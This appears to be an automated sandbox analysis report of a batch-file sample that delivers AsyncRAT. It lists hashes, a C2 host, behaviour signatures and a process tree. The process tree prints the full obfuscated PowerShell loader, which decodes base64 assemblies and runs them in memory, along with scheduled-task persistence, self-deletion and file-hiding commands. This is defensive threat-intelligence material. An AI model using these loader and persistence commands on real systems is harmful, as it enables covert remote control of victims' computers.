Analysis

  • max time kernel
    75s
  • max time network
    79s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240709-en
  • resource tags

    arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    19-07-2024 04:39

General

  • Target

    startup_str.bat

  • Size

    382KB

  • MD5

    8b1f260a182f74419011f14a8ba21a37

  • SHA1

    48d8da3f5971ebd6b358b6b63491b5e68f099a6c

  • SHA256

    478ca90bdf1d94b880dd18c1fd1a5b6124d4e1c4b77c546df88a0aa992aeb225

  • SHA512

    509a8b51cb3922f9be6c94029abbc4611b1ce438262abc9fef414780e97d7542d214ae42866ccaf540b52e6cfef017abfc00c891643b3b81753c9f4115ad64aa

  • SSDEEP

    6144:UJ+xnM15AXYHvdijZhhzPrJaBuLEQ/npzItPvshlqfyef:f8udDJ5hmPvqlRy

Malware Config

Extracted

Family

asyncrat

Version

AsyncRAT

Botnet

unam

C2

windowsignn.theworkpc.com:6606

Mutex

AsyncMutex_5552

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 2 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\startup_str.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1492
    • C:\Users\Admin\AppData\Local\Temp\startup_str.bat.exe
      "C:\Users\Admin\AppData\Local\Temp\startup_str.bat.exe" -noprofile -w hidden -ep bypass -command $gingerbread_ZGT90N5CQZ = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\startup_str.bat').Split([Environment]::NewLine); foreach ($gingerbread_1KH5QPC857 in $gingerbread_ZGT90N5CQZ) { $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace('_0', '0', ' '); $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_IR2OYLS2I9, '_', 'gingerbread_2REG6QYLBJP6'); if ($gingerbread_1KH5QPC857 -match $gingerbread_IR2OYLS2I9) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_1KH5QPC857, 'gingerbread_2REG6QYLBJP6', ''); $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, '#', '/');break; }; }; if ($gingerbread_5Q959MQ6PK.Contains('CHOQNLJXHRYDBXUDFLOEFXTOXDPILO')) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, 'CHOQNLJXHRYDBXUDFLOEFXTOXDPILO', ''); } else { exit }; $gingerbread_C3UENP8XTK = [string[]]$gingerbread_5Q959MQ6PK.Split('!'); $gingerbread_43B9R06ZVX = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[0]); $gingerbread_L6GT4COAOJ = [System.Reflection.Assembly]::Load($gingerbread_43B9R06ZVX); $gingerbread_75K25BI6VC = $gingerbread_L6GT4COAOJ.EntryPoint; $gingerbread_75K25BI6VC.Invoke($null, $null); $gingerbread_ONPA8XRGXD = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[1]); $gingerbread_P0L16O4G72 = [System.Reflection.Assembly]::Load($gingerbread_ONPA8XRGXD); $gingerbread_1JGKLRH6G6 = $gingerbread_P0L16O4G72.EntryPoint; $gingerbread_1JGKLRH6G6.Invoke($null, $null)
      2⤵
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4536
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4536);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1660
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C ATTRIB +H "C:\Users\Admin\AppData\Local\Temp\startup_str.bat.exe" & exit
        3⤵
        • Hide Artifacts: Hidden Files and Directories
        • Suspicious use of WriteProcessMemory
        PID:808
        • C:\Windows\system32\attrib.exe
          ATTRIB +H "C:\Users\Admin\AppData\Local\Temp\startup_str.bat.exe"
          4⤵
          • Views/modifies file attributes
          PID:4184
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3568
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2120
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:676
          • C:\Users\Admin\AppData\Roaming\startup_str.bat.exe
            "C:\Users\Admin\AppData\Roaming\startup_str.bat.exe" -noprofile -w hidden -ep bypass -command $gingerbread_ZGT90N5CQZ = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\startup_str.bat').Split([Environment]::NewLine); foreach ($gingerbread_1KH5QPC857 in $gingerbread_ZGT90N5CQZ) { $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace('_0', '0', ' '); $gingerbread_IR2OYLS2I9 = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_IR2OYLS2I9, '_', 'gingerbread_2REG6QYLBJP6'); if ($gingerbread_1KH5QPC857 -match $gingerbread_IR2OYLS2I9) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_1KH5QPC857, 'gingerbread_2REG6QYLBJP6', ''); $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, '#', '/');break; }; }; if ($gingerbread_5Q959MQ6PK.Contains('CHOQNLJXHRYDBXUDFLOEFXTOXDPILO')) { $gingerbread_5Q959MQ6PK = [System.Text.RegularExpressions.Regex]::Replace($gingerbread_5Q959MQ6PK, 'CHOQNLJXHRYDBXUDFLOEFXTOXDPILO', ''); } else { exit }; $gingerbread_C3UENP8XTK = [string[]]$gingerbread_5Q959MQ6PK.Split('!'); $gingerbread_43B9R06ZVX = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[0]); $gingerbread_L6GT4COAOJ = [System.Reflection.Assembly]::Load($gingerbread_43B9R06ZVX); $gingerbread_75K25BI6VC = $gingerbread_L6GT4COAOJ.EntryPoint; $gingerbread_75K25BI6VC.Invoke($null, $null); $gingerbread_ONPA8XRGXD = [System.Convert]::FromBase64String($gingerbread_C3UENP8XTK[1]); $gingerbread_P0L16O4G72 = [System.Reflection.Assembly]::Load($gingerbread_ONPA8XRGXD); $gingerbread_1JGKLRH6G6 = $gingerbread_P0L16O4G72.EntryPoint; $gingerbread_1JGKLRH6G6.Invoke($null, $null)
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2844
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2844);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:4056
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ATTRIB +H "C:\Users\Admin\AppData\Roaming\startup_str.bat.exe" & exit
              6⤵
              • Hide Artifacts: Hidden Files and Directories
              • Suspicious use of WriteProcessMemory
              PID:3604
              • C:\Windows\system32\attrib.exe
                ATTRIB +H "C:\Users\Admin\AppData\Roaming\startup_str.bat.exe"
                7⤵
                • Views/modifies file attributes
                PID:2368

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    df472dcddb36aa24247f8c8d8a517bd7

    SHA1

    6f54967355e507294cbc86662a6fbeedac9d7030

    SHA256

    e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

    SHA512

    06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\startup_str.bat.exe.log

    Filesize

    2KB

    MD5

    65a4c109b9c69901f3df24e6a9bced9b

    SHA1

    454905988a6f69d6210e8270bf192f2aaf13fb7c

    SHA256

    dc350d4a7170121d6e00f400602f6b68fb44da79d84e24ed51e540bd27c91768

    SHA512

    ac0380477330b06dffa73145ec3e683003b9fbc92041d40eca3fa495d215f0732f081e416a89d32f497a1f5aaad67815791d7f3c63ea49eccac3d0aff9f58a9b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    7b3145563f04420661ff0a637a8aacb6

    SHA1

    2ddd85d048f7a842eb256881f63b7f70f443ec80

    SHA256

    5e0dbba9fa52c7365a890e577c9f91ddae8cf2136f298182990579caf3750d4a

    SHA512

    f009ce5337442acc7eee106a355e62902f6eaf47e4d56df7b40123f5008e81a2dc766005a411f95d7cf94e003e827b0733db241c473b0f6c7c8e35a29ca99306

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_amyluffu.xor.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\startup_str.bat.exe

    Filesize

    440KB

    MD5

    0e9ccd796e251916133392539572a374

    SHA1

    eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

    SHA256

    c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

    SHA512

    e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

  • C:\Users\Admin\AppData\Roaming\startup_str.bat

    Filesize

    382KB

    MD5

    8b1f260a182f74419011f14a8ba21a37

    SHA1

    48d8da3f5971ebd6b358b6b63491b5e68f099a6c

    SHA256

    478ca90bdf1d94b880dd18c1fd1a5b6124d4e1c4b77c546df88a0aa992aeb225

    SHA512

    509a8b51cb3922f9be6c94029abbc4611b1ce438262abc9fef414780e97d7542d214ae42866ccaf540b52e6cfef017abfc00c891643b3b81753c9f4115ad64aa

  • C:\Users\Admin\AppData\Roaming\startup_str.vbs

    Filesize

    111B

    MD5

    371257951e09cb56fafbbda4847cbcb7

    SHA1

    6d9dab286de574a099f6fe955720a1d87484cea3

    SHA256

    bb77d873388b64bacd10df67a60d012ed4acc5b03b7fa1070584b7133fa371b3

    SHA512

    1dffef10d8f25f6df8db17d09b278701211a40497d3aa8749676aeca3426cdc63232135984e74c8abf73442d917df7288b15d93229d8090684f3acba224f9bc1

  • memory/1660-28-0x00007FFCCD810000-0x00007FFCCE2D2000-memory.dmp

    Filesize

    10.8MB

  • memory/1660-79-0x00007FFCCD810000-0x00007FFCCE2D2000-memory.dmp

    Filesize

    10.8MB

  • memory/1660-29-0x00007FFCCD810000-0x00007FFCCE2D2000-memory.dmp

    Filesize

    10.8MB

  • memory/1660-31-0x00007FFCCD810000-0x00007FFCCE2D2000-memory.dmp

    Filesize

    10.8MB

  • memory/2844-75-0x0000022FA4380000-0x0000022FA438C000-memory.dmp

    Filesize

    48KB

  • memory/2844-76-0x0000022FA4390000-0x0000022FA43A6000-memory.dmp

    Filesize

    88KB

  • memory/4536-15-0x00007FFCCD810000-0x00007FFCCE2D2000-memory.dmp

    Filesize

    10.8MB

  • memory/4536-17-0x000001E346D30000-0x000001E346D7A000-memory.dmp

    Filesize

    296KB

  • memory/4536-14-0x00007FFCCD810000-0x00007FFCCE2D2000-memory.dmp

    Filesize

    10.8MB

  • memory/4536-13-0x000001E346BF0000-0x000001E346C12000-memory.dmp

    Filesize

    136KB

  • memory/4536-4-0x00007FFCCD813000-0x00007FFCCD815000-memory.dmp

    Filesize

    8KB

  • memory/4536-16-0x000001E346BD0000-0x000001E346BDA000-memory.dmp

    Filesize

    40KB

  • memory/4536-18-0x00007FFCCD810000-0x00007FFCCE2D2000-memory.dmp

    Filesize

    10.8MB

  • memory/4536-77-0x00007FFCCD810000-0x00007FFCCE2D2000-memory.dmp

    Filesize

    10.8MB

  • memory/4536-24-0x00007FFCCD810000-0x00007FFCCE2D2000-memory.dmp

    Filesize

    10.8MB